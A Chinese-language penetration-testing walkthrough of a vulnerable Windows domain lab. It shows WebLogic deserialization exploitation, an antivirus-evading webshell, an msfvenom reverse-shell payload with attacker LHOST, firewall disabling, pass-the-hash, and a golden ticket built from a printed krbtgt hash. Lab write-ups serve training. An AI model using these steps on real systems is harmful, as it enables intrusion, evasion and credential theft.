红队实战系列,主要以真实企业环境为实例搭建一系列靶场。本次红队环境主要Access Token利用、
WMI利用、域漏洞利用SMB relay , EWS relay , PTT(PTC) , MS14-068 ,GPP ,SPN利用、黄金票据/白 银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX
1. Bypass UAC
2. Windows系统NTLM获取(理论知识:Windows认证)
3. Access Token利用(MSSQL利用)
4. WMI利用
5. 网页代理,二层代理,特殊协议代理(DNS , ICMP)
6. 域内信息收集
7. 域漏洞利用:SMB relay , EWS relay , PTT(PTC) , MS14-068 ,GPP ,SPN利用
8. 域凭证收集
9. 后门技术(黄金票据/白银票据/Sid History/MOF)
内网网段:10.10.10.1/24
DMZ网段:192.168.111.1/24
测试机地址:192.168.111.1(Windows), 192.168.111.11( Linux)
防火墙策略(策略设置过后,测试机只能访问192段地址,模拟公网访问):
deny all tcp ports:10.10.10.1 allow all tcp ports:10.10.10.0/24
DC
IP: [10.10.10.10](10.10.10.10)
OS:Windows 2012(64)
应用:AD域
WEB
IP1: [10.10.10.80](10.10.10.80)
IP2: [192.168.111.80](192.168.111.80)
OS:Windows 2008(64)
应用:Weblogic 10.3.6 MSSQL 2008
PC
IP1: [10.10.10.201](10.10.10.201)
IP2: [192.168.111.201](192.168.111.201)
OS:Windows 7(32)
环境搭建
*配置网卡*
增加一个仅主机网卡,网段是10.10.10.0段:
*配置**DC*
启动,并查看网络:
配置web
启动并检查网络:
注意登录域管账户才能进去:de1ay\Administrator 1qaz@WSX
登录进去如果要修改密码,统一修改为:Aa@123456 配置网络:
将net段设置为自动获取IP
然后测试:
配置PC
启动并检查网络:
将net段设置为自动获取IP:
启动web服务
进入WBE到C:\Oracle\Middleware\user_projects\domains\base_domain\bin,使用管理员模式依次 执行脚本 :
然后访问:
Weblogic登录界面:http://192.168.222.139:7001/console
搞定。
*渗透*
渗透web
web IP: 192.168.222.139
端口扫描
nmap -sS 192.168.222.139
端口都很熟悉
80:没有站点,什么都没有
135 , 139 ,445 可以考虑利用一波 1433:mssql
3389: 可以考虑远程 7001:weblogic
nmap探测漏洞
nmap 192.168.222.133 --script vuln
有参考价值的。msf中好像没有对应的利用模块。
*永恒之蓝*
失败。
搞weblogic
weblogic漏洞有点多,我们先收集一下
借助:https://github.com/dr0op/WeblogicScan 按照使用说明操作即可。
通过下载或者git clone的方式下载下来,然后执行:
python3 WeblogicScan.py 192.168.222.139 7001
还有一个工具也可以:
https://gitee.com/gid1314/weblogicScanner/
*CVE-2019-2725*
像这种情况,有可能是因为有杀毒软件: 确实被拦截了
我们尝试编码看是否能够OK 需要高级参数:
show advanced
再次run:
MSF自带的exp用不了,那就想其他办法。
哥斯拉拿webshell
这个地方借助java的反序列化利用工具:
https://github.com/shack2/javaserializetools/releases/tag/1.0.20190828
解压执行:
java -jar Java反序列化漏洞利用工具V1.7.jar
命令执行:
利用起来应该没有问题。
接下来上传webshell,既然这个地方有360,那么我们需要有免杀功能的webshell,这里选择哥斯拉:
https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla
下载解压执行:
java -jar godzilla.jar
直接生成免杀码:
记住生成文件的位置,然后利用反序列化工具去上传木马!
用哥斯拉进行链接webshell:
关防火墙:
netsh advfirewall set allprofiles state off
和MSF联动:
然后哥斯拉上面回传:
搞定!!!
没找到windefend,那么把防火墙服务关了
但是提不了权,这个shell有点鸡肋。。。。。。
*免杀工具*
还是得走免杀这步。。。。。
免杀工具有很多,但是不一定生效,这个大家一定要注意,因为病毒库一直在更新 Invoke-Obfuscation: https://github.com/danielbohannon/Invoke-Obfuscation
Ant-AntV:https://github.com/shellfeel/Ant-AntV CuiRi:https://github.com/NyDubh3/CuiRi
FourEye:https://github.com/lengjibo/FourEye
这些工具都可以去尝试。万一成功了呢。。。。。。
通过加壳的方式去生成一个木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.222.128 LPORT=9502 - x /home/kali/Desktop/soft/ScreenBrightness.exe -k -f exe > ss.exe
直接通过CVE拿到shell:
*提权*
*内网信息收集*
会话转移给cs
将会话转移给CS进行收集:创建监听器:
msf使用:
use exploit/windows/local/payload_inject
*提权*
*基本信息收集*
*端口扫描*
顺带主机一起扫描
*内网渗透*
*hashdump*
*PTH*
DC开了445,先搞DC:
先搞个SMB的监听器:
拿下DC:
相同的方式拿下PC:
*权限维持*
*黄金票据*
先在DC中进行hashdump:
拿到域的SID:
用户名:Administrator
domain: de1ay.com
SID: S-1-5-21-2756371121-2868759905-3853650604-1001
krbtgt-hash: 82dfc71b72a11ef37d663047bc2088fb
在web上制作黄金票据:
试试:
shell dir \DC\c$